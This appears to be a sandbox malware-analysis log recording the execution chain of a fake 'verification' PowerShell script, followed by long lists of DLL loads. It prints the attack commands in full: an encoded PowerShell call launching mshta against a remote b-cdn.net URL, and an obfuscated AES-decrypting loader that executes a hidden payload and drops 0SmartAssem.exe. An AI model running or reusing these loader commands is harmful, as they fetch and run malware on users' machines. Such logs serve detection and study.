              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0il2ydi0.us5.ps1Jump to behavior
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exeFile opened: C:\Windows\system32\964037318f685c834d06cfa22067553aaf5b5ab6fc15b851def7dafa67127db2AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: 0SmartAssem.exeString found in binary or memory: net/addrselect.go
              Source: 0SmartAssem.exeString found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
              Source: 0SmartAssem.exeString found in binary or memory: google.golang.org/grpc@v1.59.0/internal/balancerload/load.go
              Source: 0SmartAssem.exeString found in binary or memory: BLDfOLvpGE/load.go
              Source: 0SmartAssem.exeString found in binary or memory: ocated bad restart PC-thread limit stopm spinning nmidlelocked= needspinning=store64 failedsemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module data in goroutine internal error.in-addr.arpa.unknown mode: RegSetValueExWu
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://bidvertiser.b-cdn.net/smart1
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function HbAHmnxA($ZzZovm){return -split ($ZzZovm -replace '..', '0x$& ')};$PEcdKn = HbAHmnxA('649390CFEBE1770BAA5146DE729123CCD838E758E4276A363F637B3AAF033337AC0657955271E9550F501406601E1A41860E46E19B664FF95794FF1F3D04636BD08F0C38C4B63E80890B016BD8AB0B78879EF113B89A3F38F6F895DE87AEA8D3B7F0CCEB19C1832E835097ECCB2C36890967C12BEB560476870CFCA3B2026770977E5BFC6237BA383AB0C9BC4FEE55E653DB382E41C9866A6C0222D784911F31EBB65E3730429D060FF2E1FCA15D8F85018D75055E5F3D7F26332EE40768EC9BAFDC24FC0691D6B57AB81120A83FF0208197B7794EB8E48F081D5265C2EDE5BE7C897C05ABF2349EBA71B3759948F6CC4E3D2AA8CB8B87BC3EF6DD53F55E24B1A14B06982580B23E1CDC89A89E5FC9AEBCC45162B160BDD6D1DD820E751C213F642E6174AB940A544437CBD4B95F451F49854521B6B5F25DC2958288B9E8AE3E84EC687BF5FD542FD21B03B728755D38B9F795538690A1731AD87A4FF035E0E4DF4D5D5926749BCC457636F04DB20D58FEF916462DCAC2915FF336ECE4C613138832FB8CB53EC4DDA139297818B53354F21F92E9A237CDEA5EBA27FD7E08ABAD8BC364C8AC9D4DA7EF88987044E30E52F804D80E2DCF76EB0C85804D4469E0F07C9E5CE26611DE49AD0BB0333D282354BE10F943982430B1169A615E79E3E0C5EC79DA387AD53EAF2FD764DBB293F0EF18D616EEF99C38992715145D16CA68D09F1D913D460445AD05E1641EE4AC2B1E944F7FF45B6C7C51974DECC8B09B1CCBDC8ED7174A14C70F59EA9B96E93E8A336D668FF3C2DC68D75472553892C38D8F32E86361D381E1EE6E6E1BCA21FA73FC43DDDAFCED280453E7B5D154F59EF2BE213C2656F282EABC6A8D2F17A8B47C539E9817820B02E234FD821466297478CF4C06BF88B97D45DCF3E4C807DE237AD7614DCD6332D4DE950C177646C50F08062E130279ECE8B08C9945A79ECF6C4B88024A24DC840A12E22F404F56B7C13E2F9DC8AADEB49ECC7A67AE9983475129E57AFB8D0F9326B22E9B79AAA56DB3EEC92EA9708998095778497441E15D7795F50116CF78185726E9A7F7A3E40D436D50F77BDA8DDDBFD8CEBB4C758EA3595453635FE911BA9691EB0E2A28529D8C4B9E2D50DD40CBDBC57F9D07995096EB6B48448429C1F014B7BDF9146EC21A79ADA827E6590D159548021642354333FC8154696C9E79B4CDA3E5D22551F1F2387AAA9CE4464C571969727F845599B1BD312EB356A5E140EC6F91912B1227B9F3A941727413D53C0FE2B26DE40BB2B36462055BBF7E8A6B8281CC7FFD4048A1CD97104C3A63FF87CE63106EF7443D01D5FCE1FD67A7E73EE2A8F2CD2EFED7B4A7796DB2328BD317F0349F8B606845CBF4FC0F73D45630EF3466836C0A93133F760481FB4E2F4E46DBFF6A7AA0455989567090A3EBB373F3EC52B5EE0558518BC12408677670492BEA93021308DF47CD62CF99B8E473176B2965284653204CE093A6D8CE56300896793A61754D407EB838A56372881C0664AF37F1E9500BBAC243013C5F5953ABE1CD43347B87C2D6ED6169C7B0D8242DE3ED14C3F856F471A13CEFE0993EE315D5305CC2AC9054976C9CA5A6');$jqkxh = [System.Security.Cryptography.Aes]::Create();$jqkxh.Key = HbAHmnxA('52615577706262664D6D43476F4F4344');$jqkxh.IV = New-Object byte[] 16;$SpkOqCAK = $jqkxh.CreateDecryptor();$cWklkDGxO = $SpkOqCAK.TransformFinalBlock($PEcdKn, 0, $PEcdKn.Length);$mTmnXpOAf = [System.Text.Encoding]::Utf8.GetString($cWklkDGxO);$SpkOqCAK.Dispose();& $mTmnXpOAf.Substring(0,3) $mTmnXpOAf.Substring(3)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\0SmartAssem.exe "C:\Users\user\AppData\Roaming\0SmartAssem.exe"
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://bidvertiser.b-cdn.net/smart1Jump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function HbAHmnxA($ZzZovm){return -split ($ZzZovm -replace '..', '0x$& ')};$PEcdKn = HbAHmnxA('649390CFEBE1770BAA5146DE729123CCD838E758E4276A363F637B3AAF033337AC0657955271E9550F501406601E1A41860E46E19B664FF95794FF1F3D04636BD08F0C38C4B63E80890B016BD8AB0B78879EF113B89A3F38F6F895DE87AEA8D3B7F0CCEB19C1832E835097ECCB2C36890967C12BEB560476870CFCA3B2026770977E5BFC6237BA383AB0C9BC4FEE55E653DB382E41C9866A6C0222D784911F31EBB65E3730429D060FF2E1FCA15D8F85018D75055E5F3D7F26332EE40768EC9BAFDC24FC0691D6B57AB81120A83FF0208197B7794EB8E48F081D5265C2EDE5BE7C897C05ABF2349EBA71B3759948F6CC4E3D2AA8CB8B87BC3EF6DD53F55E24B1A14B06982580B23E1CDC89A89E5FC9AEBCC45162B160BDD6D1DD820E751C213F642E6174AB940A544437CBD4B95F451F49854521B6B5F25DC2958288B9E8AE3E84EC687BF5FD542FD21B03B728755D38B9F795538690A1731AD87A4FF035E0E4DF4D5D5926749BCC457636F04DB20D58FEF916462DCAC2915FF336ECE4C613138832FB8CB53EC4DDA139297818B53354F21F92E9A237CDEA5EBA27FD7E08ABAD8BC364C8AC9D4DA7EF88987044E30E52F804D80E2DCF76EB0C85804D4469E0F07C9E5CE26611DE49AD0BB0333D282354BE10F943982430B1169A615E79E3E0C5EC79DA387AD53EAF2FD764DBB293F0EF18D616EEF99C38992715145D16CA68D09F1D913D460445AD05E1641EE4AC2B1E944F7FF45B6C7C51974DECC8B09B1CCBDC8ED7174A14C70F59EA9B96E93E8A336D668FF3C2DC68D75472553892C38D8F32E86361D381E1EE6E6E1BCA21FA73FC43DDDAFCED280453E7B5D154F59EF2BE213C2656F282EABC6A8D2F17A8B47C539E9817820B02E234FD821466297478CF4C06BF88B97D45DCF3E4C807DE237AD7614DCD6332D4DE950C177646C50F08062E130279ECE8B08C9945A79ECF6C4B88024A24DC840A12E22F404F56B7C13E2F9DC8AADEB49ECC7A67AE9983475129E57AFB8D0F9326B22E9B79AAA56DB3EEC92EA9708998095778497441E15D7795F50116CF78185726E9A7F7A3E40D436D50F77BDA8DDDBFD8CEBB4C758EA3595453635FE911BA9691EB0E2A28529D8C4B9E2D50DD40CBDBC57F9D07995096EB6B48448429C1F014B7BDF9146EC21A79ADA827E6590D159548021642354333FC8154696C9E79B4CDA3E5D22551F1F2387AAA9CE4464C571969727F845599B1BD312EB356A5E140EC6F91912B1227B9F3A941727413D53C0FE2B26DE40BB2B36462055BBF7E8A6B8281CC7FFD4048A1CD97104C3A63FF87CE63106EF7443D01D5FCE1FD67A7E73EE2A8F2CD2EFED7B4A7796DB2328BD317F0349F8B606845CBF4FC0F73D45630EF3466836C0A93133F760481FB4E2F4E46DBFF6A7AA0455989567090A3EBB373F3EC52B5EE0558518BC12408677670492BEA93021308DF47CD62CF99B8E473176B2965284653204CE093A6D8CE56300896793A61754D407EB838A56372881C0664AF37F1E9500BBAC243013C5F5953ABE1CD43347B87C2D6ED6169C7B0D8242DE3ED14C3F856F471A13CEFE0993EE315D5305CC2AC9054976C9CA5A6');$jqkxh = [System.Security.Cryptography.Aes]::Create();$jqkxh.Key = HbAHmnxA('52615577706262664D6D43476F4F4344');$jqkxh.IV = New-Object byte[] 16;$SpkOqCAK = $jqkxh.CreateDecryptor();$cWklkDGxO = $SpkOqCAK.TransformFinalBlock($PEcdKn, 0, $PEcdKn.Length);$mTmnXpOAf = [System.Text.Encoding]::Utf8.GetString($cWklkDGxO);$SpkOqCAK.Dispose();& $mTmnXpOAf.Substring(0,3) $mTmnXpOAf.Substring(3)Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\0SmartAssem.exe "C:\Users\user\AppData\Roaming\0SmartAssem.exe" Jump to behavior
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
